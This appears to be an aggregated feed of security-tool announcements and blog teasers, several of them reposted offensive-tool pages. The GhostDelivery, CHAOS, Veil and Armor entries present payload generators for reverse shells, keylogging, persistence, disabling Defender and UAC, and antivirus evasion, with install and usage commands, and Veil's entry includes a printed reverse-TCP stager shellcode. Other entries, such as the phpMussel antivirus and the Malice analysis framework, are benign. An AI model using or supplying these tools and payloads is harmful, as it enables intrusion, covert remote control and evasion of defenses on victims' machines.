GhostDelivery – This Tool Creates A Obfuscated .vbs Script To Download A Payload Hosted On A Server To %TEMP% Directory, Execute Payload And Gain Persistence

Python script to generate obfuscated .vbs script that delivers payload with persistence and windows antivirus disabling functions.Features:Downloads payload to TEMP directory and executes payload to bypass windows smart screen. Disables Defender, UAC/user account control, Defender Notifications, injects/creates Command Prompt and Microsoft Edge shortcuts with payload path (%TEMP%/payload.exe), adds a scheduled task called “WindowsDefender" for payload to be run at login and obfuscates the vbs delivery script. This tool also has a serveo function to deliver obfuscated vbs script.Light version:The light version is less noisy and only delivers/executes payload, creates a scheduled task named "WindowsDefender" to run payload at login for persistence and injects/creates Command Prompt and Microsoft Edge shortcuts with payload path.Prerequisites/requirements:*Python 2.7, Modules imported in script. (random, sys, string, os, time, base64)Download GhostDelivery

Link: http://feedproxy.google.com/~r/PentestTools/~3/oWV8asKvS20/ghostdelivery-this-tool-creates.html

A False Sense of Cybersecurity: The Riskiest States in America

Reading Time: ~5 min.Like many Americans, you might think your online habits are safe enough—or, at least, not so risky as to put you in danger for cybercrime. As it happens, most of us in the U.S. are nowhere near as secure as we think we are. We partnered with Wakefield Research to survey 10,000 Americans, ages 18 […]
The post A False Sense of Cybersecurity: The Riskiest States in America appeared first on Webroot Blog.

Link: https://www.webroot.com/blog/2019/05/07/a-false-sense-of-cybersecurity-the-riskiest-states-in-america/

Getting Past the Hype of Next Generation Endpoint Security

We’ve heard the same story for years. Antivirus software is not effective in stopping cyber-attacks, as hackers have adapted their techniques to evade signature-based detections. Even next generation antivirus, which apply techniques such as machine learning and behavioral analytics, is no more effective at protecting an organization than its older sibling. But why? The simple […]
The post Getting Past the Hype of Next Generation Endpoint Security appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/lyCbj-Pa38M/

CHAOS Framework v2.0 – Generate Payloads And Control Remote Windows Systems

CHAOS is a PoC that allow generate payloads and control remote operating systems.Features Feature Windows Mac Linux Reverse Shell X X X Download File X X X Upload File X X X Screenshot X X X Keylogger X Persistence X Open URL X X X Get OS Info X X X Fork Bomb X X X Run Hidden X Tested OnKali Linux – ROLLING EDITIONHow to Install# Install dependencies$ sudo apt install golang git -y# Get this repository$ go get github.com/tiagorlampert/CHAOS# Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)$ go get github.com/kbinani/screenshot$ go get github.com/lxn/win$ go get github.com/matishsiao/goInfo$ go get golang.org/x/sys/windows# Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files".# It’s occurs because the libraries are to windows systems, but it necessary to build the payload.# Go into the repository$ cd ~/go/src/github.com/tiagorlampert/CHAOS# Run$ go run main.goHow to Use Command On HOST does… generate Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos –windows) lhost= Specify a ip for connection lport= Specify a port for connection fname= Specify a filename to output –windows Target Windows –macos Target Mac OS –linux Target Linux listen Listen for a new connection (e.g. listen lport=8080) serve Serve files exit Quit this program Command On TARGET does… download File Download upload File Upload screenshot Take a Screenshot keylogger_start Start Keylogger session keylogger_show Show Keylogger session logs persistence_enable Install at Startup persistence_disable Remove from Startup getos Get OS name lockscreen Lock the OS screen openurl Open the URL informed bomb Run Fork Bomb clear Clear the Screen back Close connection but keep running on target exit Close connection and exit on target VideoFAQWhy does Keylogger capture all uppercase letters?All the letters obtained using the keylogger are uppercase letters. It is a known issue, in case anyone knows how to fix the Keylogger function using golang, please contact me or open an issue.Why are necessary get and install external libraries?To implement the screenshot function i used a third-party library, you can check it in https://github.com/kbinani/screenshot and https://github.com/lxn/win. You must download and install it to generate the payload.Contacttiagorlampert@gmail.comDownload CHAOS

Link: http://www.kitploit.com/2019/04/chaos-framework-v20-generate-payloads.html

phpMussel – PHP-based Anti-Virus Anti-Trojan Anti-Malware Solution

phpMussel is an ideal solution for shared hosting environments, where it’s often not possible to utilize or install conventional anti-virus protection solutions, phpMussel is a PHP script designed to detect trojans, viruses, malware and other threats within files uploaded to your system wherever the script is hooked, based on the signatures of ClamAV and others. For information regarding HOW TO INSTALL {2A+2B} and HOW TO USE {3A+3B} phpMussel, please refer either to the Wiki or to the documentation included within the “_docs" directory of this repository (direct links to that documentation included under the "Documentation" header below this paragraph).Features:Licensed as GNU General Public License version 2.0 (GPLv2).Easy to install, easy to customise, easy to use.Works for any system with PHP+PCRE installed, regardless of OS (PHP+PCRE required).Fully configurable based on your needs.Ideal solution for shared hosting services.Ideal solution for forum systems in need of file upload protection.Does NOT require shell access.Does NOT require administrative privileges.CLI mode available.Good, strong, stable support base.Documentation:EnglishالعربيةDeutschEspañolFrançaisBahasa IndonesiaItaliano日本語한국어NederlandsePortuguêsРусскийاردوTiếng Việt中文(简体)中文(傳統)Download phpMussel

Link: http://feedproxy.google.com/~r/PentestTools/~3/GyXiM5XXkzc/phpmussel-php-based-anti-virus-anti.html

ASUS, Microsoft, & Tesla – Hack Naked News #212

    Zero-Days in Counter Strike client could be used to build a major botnet, huge aluminum plants hit by ‘severe’ ransomware attack, Myspace loses 50 million songs in server migration, wifi signals can reveal your password, and PuTTY in your hands: an SSH client gets patched after RSA key exchange memory vulnerability was spotted! […]
The post ASUS, Microsoft, & Tesla – Hack Naked News #212 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/VrsX9vpaVWg/

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice’s mission is to be a free open source version of VirusTotal that anyone can use at any scale from an independent researcher to a fortune 500 company.Try It OutDEMO: demo.malice.iousername: malicepassword: ecilamRequirementsHardware~16GB disk space~4GB RAMSoftwareDockerGetting Started (OSX)Install$ brew install maliceio/tap/maliceUsage: malice [OPTIONS] COMMAND [arg…]Open Source Malware Analysis FrameworkVersion: 0.3.11Author: blacktop – Options: –debug, -D Enable debug mode [$MALICE_DEBUG] –help, -h show help –version, -v print the versionCommands: scan Scan a file watch Watch a folder lookup Look up a file hash elk Start an ELK docker container plugin List, Install or Remove Plugins help Shows a list of commands or help for one commandRun ‘malice COMMAND –help’ for more information on a command.Scan some malware$ malice scan evil.malwareNOTE: On the first run malice will download all of it’s default plugins which can take a while to complete.Malice will output the results as a markdown table that can be piped or copied into a results.md that will look great on Github see hereStart Malice’s Web UI$ malice elkYou can open the Kibana UI and look at the scan results here: http://localhost (assuming you are using Docker for Mac)Type in malice as the Index name or pattern and click Create. Now click on the Malice Tab and behold!!! Getting Started (Docker in Docker)Install/Update all Pluginsdocker run –rm -v /var/run/docker.sock:/var/run/docker.sock malice/engine plugin update –allScan a filedocker run –rm -v /var/run/docker.sock:/var/run/docker.sock \ -v `pwd`:/malice/samples \ -e MALICE_VT_API=$MALICE_VT_API \ malice/engine scan SAMPLEDocumentationDocumentationPluginsExamplesRoadmapContributingDownload Malice

Link: http://feedproxy.google.com/~r/PentestTools/~3/MYaRxSE3IIE/malice-virustotal-wanna-be-now-with-100.html

The Must-Have Tech Accessory for Students

Reading Time: ~4 min.We live in a digital age where internet-connected devices are the norm. Our phones, our televisions, even our light bulbs are tied together in today’s tech ecosystem. For high school and college students, this degree of digital connection is the standard, and when school is in session, tech accessories are a popular way to customize […]
The post The Must-Have Tech Accessory for Students appeared first on Webroot Blog.

Link: https://www.webroot.com/blog/2019/01/10/the-must-have-tech-accessory-for-students/

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.Veil is current under support by @ChrisTruncerSoftware Requirements:The following OSs are officially supported:Debian 8+Kali Linux Rolling 2018.1+The following OSs are likely able to run Veil:Arch LinuxBlackArch LinuxDeepin 15+ElementaryFedora 22+Linux MintParrot SecurityUbuntu 15.10+SetupKali’s Quick Installapt -y install veil/usr/share/veil/config/setup.sh –force –silentGit’s Quick InstallNOTE:Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning.Your package manager may be different to apt.sudo apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/./config/setup.sh –force –silent./config/setup.sh // Setup FilesThis file is responsible for installing all the dependences of Veil. This includes all the WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.It includes two optional flags, –force and –silent:–force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.–silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.This can be ran either by doing: ./Veil.py –setup OR ./config/setup.sh –force../config/update-config.py // Regenerating Configuration fileThis will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update).It is important that you are in the ./config/ directory before executing update-config.py. If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following: Main Menu 0 payloads loadedDon’t panic. Run either: ./Veil.py –config OR cd ./config/; ./update-config.py.Py2ExeNOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).MANUALLY Install on a Windows Computer (as this isn’t done by Veil’s setup):Python 3.3Py2ExePyCryptoPyWin32Example UsageVeil’s Main Menu:$ ./Veil.py=============================================================================== Veil | [Version]: 3.1.6=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================Main Menu 2 tools loadedAvailable Tools: 1) Evasion 2) OrdnanceAvailable Commands: exit Completely exit Veil info Information on a specific tool list List available tools options Show Veil configuration update Update Veil use Use a specific toolVeil>:Help$ ./Veil.py –helpusage: Veil.py [–list-tools] [-t TOOL] [–update] [–setup] [–config] [–version] [–ip IP] [–port PORT] [–list-payloads] [-p [PAYLOAD]] [-o OUTPUT-NAME] [-c [OPTION=value [OPTION=value …]]] [–msfoptions [OPTION=value [OPTION=value …]]] [–msfvenom ] [–compiler pyinstaller] [–clean] [–ordnance-payload PAYLOAD] [–list-encoders] [-e ENCODER] [-b \x00\x0a..] [–print-stats]Veil is a framework containing multiple tools.[*] Veil Options: –list-tools List Veil’s tools -t TOOL, –tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.) –update Update the Veil framework –setup Run the Veil framework setup file & regenerate the configuration –config Regenerate the Veil framework configuration file –version Displays version and quits[*] Callback Settings: –ip IP, –domain IP IP address to connect back to –port PORT Port number to connect to[*] Payload Settings: –list-payloads Lists all available payloads for that tool[*] Veil-Evasion Options: -p [PAYLOAD] Payload to generate -o OUTPUT-NAME Output file base name for source and compiled binaries -c [OPTION=value [OPTION=value …]] Custom payload module options –msfoptions [OPTION=value [OPTION=value …]] Options for the specified metasploit payload –msfvenom [] Metasploit shellcode to generate (e.g. windows/meterpreter/reverse_tcp etc.) –compiler pyinstaller Compiler option for payload (currently only needed for Python) –clean Clean out payload folders[*] Veil-Ordnance Shellcode Options: –ordnance-payload PAYLOAD Payload type (bind_tcp, rev_tcp, etc.)[*] Veil-Ordnance Encoder Options: –list-encoders Lists all available encoders -e ENCODER, –encoder ENCODER Name of shellcode encoder to use -b \x00\x0a.., –bad-chars \x00\x0a.. Bad characters to avoid –print-stats Print information about the encoded shellcode$Veil Evasion CLI$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py –ip 127.0.0.1 –port 4444=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================runtime/internal/sysruntime/internal/atomicruntimeerrorsinternal/racesync/atomicmathsynciounicode/utf8internal/syscall/windows/sysdllunicode/utf16syscallstrconvreflectencoding/binarycommand-line-arguments=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Language: go [*] Payload Module: go/meterpreter/rev_tcp [*] Executable written to: /var/lib/veil/output/compiled/payload.exe [*] Source code written to: /var/lib/veil/output/source/payload.go [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc$$ file /var/lib/veil/output/compiled/payload.exe/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows$Veil Ordnance CLI$ ./Veil.py -t Ordnance –ordnance-payload rev_tcp –ip 127.0.0.1 –port 4444=============================================================================== Veil-Ordnance=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Payload Name: Reverse TCP Stager (Stage 1) [*] IP Address: 127.0.0.1 [*] Port: 4444 [*] Shellcode Size: 287\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3$Download Veil

Link: http://www.kitploit.com/2018/12/veil-tool-to-generate-metasploit.html

Armor – Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners

Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Below is an example gif of Armor being used with a simple Netcat payload.A Netcat listener is started on port 4444. The “payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker’s Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker’s server. When the stager is executed in the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the harddrive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an exmaple. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.InstallationArmor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn’t found in your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.Armor can be cloned and executed using the below commands.git clone https://github.com/tokyoneon/Armorcd Armor/chmod +x armor.sh./armor.sh /path/to/payload.txt 1.2.3.4 443The 1.2.3.4 address is the attacker’s IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443), is arbitrary and can be changed as needed.Questions and concerns:Twitter: @tokyoneon_WonderHowTo: https://creator.wonderhowto.com/tokyoneon/Email: dG9reW9uZW9uQHBtLm1lCg==Download Armor

Link: http://feedproxy.google.com/~r/PentestTools/~3/KyKciqnowOA/armor-tool-designed-to-create-encrypted.html